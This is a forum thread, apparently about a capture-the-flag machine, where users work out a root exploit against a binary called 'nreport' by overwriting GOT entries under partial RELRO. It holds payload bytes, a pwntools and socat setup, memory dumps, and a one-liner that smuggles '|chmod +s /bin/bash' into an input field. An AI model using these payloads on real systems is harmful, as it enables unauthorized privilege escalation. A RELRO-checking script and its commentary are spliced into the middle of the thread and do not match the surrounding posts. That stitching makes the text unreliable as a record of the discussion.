Posts: 78 Threads: 0 Joined: N/A

(June 17, 2022, 07:15 PM) yournamehere Wrote:
I thought I was close to root, but when you break through a wall you hit another one! Oh man!

(July 14, 2022, 12:12 AM) meowmeowattack Wrote:
I see what you meant there, I think I'm also hitting the "another wall". I was crafting the exploit by running nreport from cmd, rather than using socat.....

(July 14, 2022, 12:10 PM) yournamehere Wrote:
Shouldn't be a problem as we interact with the app prompt. Did you find the pointer I mentioned? Had a chat with Cryptocat, he told me we should be able to overwrite the GOT as we have partial RELRO, but for some reason it doesn't work here.

(July 14, 2022, 09:17 PM) meowmeowattack Wrote:
Hi there,
The way I'm currently doing it is like this: overwrite printf and overflow into fopen with a ref to system, so that fopen can execute the info stored in userinfo1 + 0x8c, which can be something like "| touch poc"; this will be executed.

    overflow_padding = b'\x00'*(4*9)
    printf_got = b'\x7c\x15\x40\x00'  # overwrite with report  # set {long}0x404088=0x0040157c
    fopen_got = b'\x80\x11\x40\x00'   # overwrite with system  # set {long}0x404070=0x00401180
    payload = printf_got + overflow_padding + fopen_got

However, this only works if I run nreport without socat; I can also reproduce this using pwntools:

    python -c "print('UiBXpthJzfNyBk ' + '|chmod +s /bin/bash ' + '1 1 1 '); print('3 ' + '-1831 '); print('\x7c\x15\x40\x00' + '\x00'*(4*9-1) + '\x80\x11\x40\x00');" | /usr/local/bin/Nreport/nreport

But it doesn't work when running via socat, even though when debugging the process everything seems to be the same as running without socat:

    from pwn import *

    server = process(['socat', 'tcp4-listen:9851,reuseaddr,fork,bind=127.0.0.1',
                      'exec:/usr/local/bin/Nreport/nreport,pty,stderr'])
    sleep(1)  # Wait for socat to start
    p = remote('127.0.0.1', 9851)
    sleep(1)  # Wait for the process to fork

Any more nudges?

Finally got root. The aforementioned issue was caused by the pty; this post helped: https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/socat

Posts: 6 Threads: 0 Joined: N/A

(July 15, 2022, 03:18 AM) meowmeowattack Wrote:
Hi bro, can you please share the root hash? Thanks.

Posts: 78 Threads: 0 Joined: N/A

(July 15, 2022, 07:17 AM) never_konw_who Wrote:
syn's write-up doesn't have the exploit dev part yet, so there's no use in getting the root hash.

Following is the concept of how to develop the exploit:
* locate a pointer that points to the printf GOT; edit -1831 leads to this pointer
* locate the report function address, overwrite X with this address
* locate the system function address, overwrite Y with this address
* between X and Y, fill with null padding
* for the socat part, some characters are control characters; they need to be escaped using \x16, e.g. \x16\xCC

    0x404040 <...>: 0xd0 0xd0 0xa7 0xf7 0xff 0x7f 0x00 0x00
    0x404048 <...>: 0xXX 0xXX 0xXX 0xXX 0x00 0x00 0x00 0x00
    0x404050 <...>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x404058 <...>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x404060 <...>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x404068 <...>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x404070 <...>: 0xYY 0xYY 0xYY 0xYY 0x00 0x00 0x00 0x00
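The whole technique in this thread depends on one linker setting: with partial RELRO the .got.plt stays writable after startup, so a write primitive can redirect an imported function to report or system; with full RELRO (PT_GNU_RELRO plus BIND_NOW, i.e. linking with -Wl,-z,relro,-z,now) every import is resolved before main() and the GOT is remapped read-only, which removes this target entirely. The following checker is an added example written for this thread, not code from the box or from any poster; it reads the same ELF64 fields that tools like checksec use, and the test images it builds are constructed stubs containing only the headers the check consults (constants are the standard ELF values).

```python
"""Classify an ELF64 binary's RELRO level from its program headers and
dynamic section. Partial RELRO (PT_GNU_RELRO present, no BIND_NOW) is
what leaves .got.plt writable after startup; full RELRO (BIND_NOW too)
resolves every import up front and then maps the whole GOT read-only."""
import struct
import sys

# Standard ELF constants (elf.h).
PT_DYNAMIC = 2
PT_GNU_RELRO = 0x6474E552
DT_NULL = 0
DT_FLAGS = 0x1E
DT_FLAGS_1 = 0x6FFFFFFB
DF_BIND_NOW = 0x8
DF_1_NOW = 0x1


def classify_relro(elf: bytes) -> str:
    """Return 'none', 'partial' or 'full' for a little-endian ELF64 image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    e_phoff = struct.unpack_from("<Q", elf, 0x20)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)

    has_relro_segment = False
    dyn_off = dyn_size = None
    for i in range(e_phnum):
        p_type, _flags, p_offset, _va, _pa, p_filesz, _memsz, _align = \
            struct.unpack_from("<IIQQQQQQ", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:
            has_relro_segment = True
        elif p_type == PT_DYNAMIC:
            dyn_off, dyn_size = p_offset, p_filesz
    if not has_relro_segment:
        return "none"

    # BIND_NOW can be expressed through DT_FLAGS or DT_FLAGS_1 (or both).
    bind_now = False
    if dyn_off is not None:
        for off in range(dyn_off, dyn_off + dyn_size, 16):
            d_tag, d_val = struct.unpack_from("<qQ", elf, off)
            if d_tag == DT_NULL:
                break
            if (d_tag == DT_FLAGS and d_val & DF_BIND_NOW) or \
               (d_tag == DT_FLAGS_1 and d_val & DF_1_NOW):
                bind_now = True
    return "full" if bind_now else "partial"


def got_writable_after_startup(elf: bytes) -> bool:
    """True when a GOT-entry overwrite of the kind discussed here is possible."""
    return classify_relro(elf) != "full"


def build_test_elf(relro_segment: bool, bind_now: bool) -> bytes:
    """Constructed test image (not a real program): only the ELF header,
    program headers and dynamic entries read by classify_relro() are filled."""
    dyn = b""
    if bind_now:
        dyn += struct.pack("<qQ", DT_FLAGS, DF_BIND_NOW)
        dyn += struct.pack("<qQ", DT_FLAGS_1, DF_1_NOW)
    dyn += struct.pack("<qQ", DT_NULL, 0)

    phnum = 2 if relro_segment else 1
    phoff = 64                      # program headers follow the ELF header
    dyn_off = phoff + phnum * 56    # dynamic section follows the phdrs
    phdrs = struct.pack("<IIQQQQQQ", PT_DYNAMIC, 6, dyn_off,
                        0x403E00, 0x403E00, len(dyn), len(dyn), 8)
    if relro_segment:
        # File offset/size are placeholders; the checker only looks at p_type.
        phdrs += struct.pack("<IIQQQQQQ", PT_GNU_RELRO, 4, 0x2E00,
                             0x403E00, 0x403E00, 0x200, 0x200, 1)

    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, LSB
    header = ident + struct.pack("<HHIQQQIHHHHHH",
                                 3, 0x3E, 1, 0x401000,   # ET_DYN, x86-64
                                 phoff, 0, 0, 64, 56, phnum, 64, 0, 0)
    return header + phdrs + dyn


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_test_elf(True, False)
    print(f"{path or '<constructed sample>'}: {classify_relro(data)} RELRO")
```

Run it as `python3 relro_check.py /path/to/binary` against a real executable; with no argument it classifies the constructed partial-RELRO sample. The "partial" result is the condition yournamehere describes, and rebuilding the program with `-Wl,-z,relro,-z,now` is the change that turns it into "full".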
Posts: 35 Threads: 0 Joined: N/A

(July 15, 2022, 08:19 AM) meowmeowattack Wrote:

Congrats! I tried this but for some reason I couldn't overwrite the GOT even without socat :dodgy: I overwrote the echo command using a pointer to 0x3ff810. I still wonder how to send non-ASCII chars using python3 and bypass the UTF-16. Maybe your trick to use \x16 is a good workaround.

Posts: 35 Threads: 0 Joined: N/A

(July 15, 2022, 08:19 AM) meowmeowattack Wrote:
BTW, if you wish to discuss our different findings and solutions, feel free to DM. I'll be glad to share :)

Posts: 35 Threads: 0 Joined: N/A July 16, 2022 at 11:59 AM

(July 15, 2022, 08:19 AM) meowmeowattack Wrote:
Your private messages are disabled, I can't answer :(

Posts: 56 Threads: 0 Joined: N/A October 22, 2022 at 4:37 AM

Will check it out.